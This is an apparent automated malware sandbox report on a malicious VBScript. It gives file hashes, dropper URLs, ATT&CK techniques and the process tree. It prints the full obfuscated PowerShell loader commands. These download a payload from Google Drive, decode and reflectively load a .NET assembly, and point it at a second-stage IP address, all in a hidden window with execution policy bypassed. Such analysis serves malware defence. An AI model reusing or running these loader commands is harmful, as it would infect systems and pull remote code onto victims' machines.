d9ac7c9de98bcda1ccf6bc34b29c9a7484baa21494eef52f1ae781934e617b3f

General

Target

win78MPDW-constraints.vbs
Size

136KB
MD5

6a48228565ed733cd60056d99cff8a6b
SHA1

e9b69eb11d2a9c6eab1a1429201ccebc92b9fef3
SHA256

d9ac7c9de98bcda1ccf6bc34b29c9a7484baa21494eef52f1ae781934e617b3f
SHA512

d3387d9f844ade99dabfc6b0bb93a8f38a89c85ecaed21a7e75a74cccf81c721134be9e345a9eb251bca5ec464a7a7651396fc7fb0e9a3612bf9fca310572d62
SSDEEP

3072:CaTCgt5pKGw018Ywypkdf2IULVnKQ4eC5kA:t3adfbYdKQhK7

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2492	powershell.exe
7	2492	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2308	powershell.exe
2492	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2308	powershell.exe
2492	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2308	powershell.exe
Token: SeDebugPrivilege	2492	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2348 wrote to memory of 2308	2348	WScript.exe	30
PID 2348 wrote to memory of 2308	2348	WScript.exe	30
PID 2348 wrote to memory of 2308	2348	WScript.exe	30
PID 2308 wrote to memory of 2492	2308	powershell.exe	32
PID 2308 wrote to memory of 2492	2308	powershell.exe	32
PID 2308 wrote to memory of 2492	2308	powershell.exe	32

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\win78MPDW-constraints.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2348
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJEVuVjpjT01TcEVjWzQsMTUsMjVdLWpPSU4nJykoICgnUjdiaW1hZ2VVcmwgPSB1MWtodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTEnKydBSVZnSkpKdjFGNnZTNCcrJ3NVT3libkgtc0R2VWhCWXd1ciB1MWs7UicrJzdid2ViQ2xpZW50ID0gTmV3JysnLU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsnKydSN2JpbWFnZUJ5dCcrJ2VzID0gUjdid2ViQ2xpZW50LkRvd25sb2FkRGEnKyd0YShSN2JpbWFnZVVybCk7JysnUjdiaW1hZ2VUZXh0ICcrJz0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbicrJ2coUjdiaW1hZ2VCeXRlcyk7Ujdic3RhcnRGbGFnID0gdTFrPDxCQVNFNjRfU1RBUlQ+PnUxaycrJztSN2JlbmRGbGFnID0gdTFrPDxCQVNFNjRfRU5EPj51MWs7Ujdic3RhcnQnKydJbmRleCA9IFI3YmltYWdlVGV4dCcrJy5JbmRleE9mKFI3YnN0YXJ0RmxhZyk7UjdiZW4nKydkSW5kJysnZXggPSBSN2JpbWFnZVRleHQuSW5kZXhPZihSN2JlbmRGbGFnKTtSN2JzdGFydEluZGV4IC1nZSAwIC1hbmQnKycgUjdiZW5kSW5kZXggLWd0IFI3YnN0YXJ0SW5kZXg7UjdicycrJ3RhcnRJJysnbmRleCArPSBSN2JzdGFydEZsYWcuTGVuZ3RoO1I3YmJhc2U2NExlbmd0aCA9IFI3YmVuZEluZGV4IC0gUjdic3RhcnRJbmRleDtSN2JiYXNlNjRDb21tYW5kID0gUjdiaW1hZ2VUZXh0LlN1YnN0cmluZyhSN2JzdGFydEluZGV4LCBSN2JiYXNlNjRMZW5ndGgpO1I3YmJhc2U2NCcrJ1JldmVyc2VkID0gLWpvaScrJ24gKFI3YmJhc2U2NENvbW0nKydhbmQuVG9DaGFyQXJyYXkoKSBqQlogRm9yRWFjaC1PYmplY3QgeyBSN2JfIH0pWy0xLi4tKFI3YmInKydhc2U2NENvbW1hbmQuTGVuZ3RoKV07UjdiYycrJ29tbWFuZEJ5dGVzID0gW1N5c3RlbScrJy5DJysnb252ZXJ0XTo6RnJvbUJhcycrJ2U2NFN0cmluZyhSN2JiYXNlNjRSZXZlcnNlZCk7JysnUjdibG9hZGVkQXNzZW1ibHkgPSBbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXNzZW1ibHldOicrJzpMb2FkKFI3YmNvbScrJ21hbmRCeXRlcyk7UjcnKydidmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh1MWtWQUl1MWspO1I3YnZhaU1ldGhvZC5JbnZva2UoUjdibicrJ3VsbCwgQCgnKyd1MWt0eHQuNDQ0NmVzYWJiYmJiYicrJ2JiYmJldycrJ21hZGFtLzQzMS44NzEuNjQuODkxLy86cHR0aHUxaywgdTFrZCcrJ2VzYXRpdmFkb3UxaywgdTFrZGVzYXRpdmFkb3UxaywgdTFrZGVzYXRpdmFkb3UxaywgdTFrQWRkSW5Qcm9jZXNzMzJ1MWssIHUxa2Rlc2F0aXZhZG91MScrJ2ssIHUxa2Rlc2F0aXZhZG91MWssdTFrZGVzYXRpdmFkb3Uxayx1MWtkZXNhdGl2YWRvdTFrLHUxa2Rlc2F0aXZhZG91MWssdTEnKydrZGVzYXRpdmFkb3Uxayx1MWtkJysnZXNhdGl2YWRvdTFrLHUxazF1MWssdTFrZGVzYXRpdmFkb3UxaykpOycpLlJFUExhQ0UoKFtjSGFyXTgyK1tjSGFyXTU1K1tjSGFyXTk4KSxbU3RySW5nXVtjSGFyXTM2KS5SRVBMYUNFKCd1MWsnLFtTdHJJbmddW2NIYXJdMzkpLlJFUExhQ0UoJ2pCWicsW1N0ckluZ11bY0hhcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2308
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $EnV:cOMSpEc[4,15,25]-jOIN'')( ('R7bimageUrl = u1khttps://drive.google.com/uc?export=download&id=1'+'AIVgJJJv1F6vS4'+'sUOybnH-sDvUhBYwur u1k;R'+'7bwebClient = New'+'-Object System.Net.WebClient;'+'R7bimageByt'+'es = R7bwebClient.DownloadDa'+'ta(R7bimageUrl);'+'R7bimageText '+'= [System.Text.Encoding]::UTF8.GetStrin'+'g(R7bimageBytes);R7bstartFlag = u1k<<BASE64_START>>u1k'+';R7bendFlag = u1k<<BASE64_END>>u1k;R7bstart'+'Index = R7bimageText'+'.IndexOf(R7bstartFlag);R7ben'+'dInd'+'ex = R7bimageText.IndexOf(R7bendFlag);R7bstartIndex -ge 0 -and'+' R7bendIndex -gt R7bstartIndex;R7bs'+'tartI'+'ndex += R7bstartFlag.Length;R7bbase64Length = R7bendIndex - R7bstartIndex;R7bbase64Command = R7bimageText.Substring(R7bstartIndex, R7bbase64Length);R7bbase64'+'Reversed = -joi'+'n (R7bbase64Comm'+'and.ToCharArray() jBZ ForEach-Object { R7b_ })[-1..-(R7bb'+'ase64Command.Length)];R7bc'+'ommandBytes = [System'+'.C'+'onvert]::FromBas'+'e64String(R7bbase64Reversed);'+'R7bloadedAssembly = [Syst'+'em.Reflection.Assembly]:'+':Load(R7bcom'+'mandBytes);R7'+'bvaiMethod = [dnlib.IO.Home].GetMethod(u1kVAIu1k);R7bvaiMethod.Invoke(R7bn'+'ull, @('+'u1ktxt.4446esabbbbbb'+'bbbbew'+'madam/431.871.64.891//:ptthu1k, u1kd'+'esativadou1k, u1kdesativadou1k, u1kdesativadou1k, u1kAddInProcess32u1k, u1kdesativadou1'+'k, u1kdesativadou1k,u1kdesativadou1k,u1kdesativadou1k,u1kdesativadou1k,u1'+'kdesativadou1k,u1kd'+'esativadou1k,u1k1u1k,u1kdesativadou1k));').REPLaCE(([cHar]82+[cHar]55+[cHar]98),[StrIng][cHar]36).REPLaCE('u1k',[StrIng][cHar]39).REPLaCE('jBZ',[StrIng][cHar]124))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2492

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OA9SOCAWUCY8IIE0V098.temp

Filesize
7KB

MD5
16f971e1b3a94cfb4aa725941eee81f2

SHA1
0af4030a2b7301d30ed6d840b6c4d1bd8a5ef905

SHA256
83ce62c25caa7bad757f084e2e8aa757b658248d5f92e455e5e6bbb2d8f74df0

SHA512
00f12139797c2bf80f8f7a52ee8583ef4d88defe007028a426b48cb63d05fb5d9f044968691711a105d8da463417f8320124cbae5efafb1b32d9113e00d4c65a

Download Submit
memory/2308-9-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmp

Filesize
9.6MB

Download
memory/2308-7-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmp

Filesize
9.6MB

Download
memory/2308-6-0x0000000002860000-0x0000000002868000-memory.dmp

Filesize
32KB

Download
memory/2308-8-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmp

Filesize
9.6MB

Download
memory/2308-10-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmp

Filesize
9.6MB

Download
memory/2308-4-0x000007FEF56BE000-0x000007FEF56BF000-memory.dmp

Filesize
4KB

Download
memory/2308-11-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmp

Filesize
9.6MB

Download
memory/2308-5-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

Filesize
2.9MB

Download
memory/2308-17-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmp

Filesize
9.6MB

Download
memory/2308-18-0x000007FEF56BE000-0x000007FEF56BF000-memory.dmp

Filesize
4KB

Download
memory/2308-22-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmp

Filesize
9.6MB

Download
memory/2492-21-0x000000001AE00000-0x000000001AF5A000-memory.dmp

Filesize
1.4MB

Download

Analysis

Sharing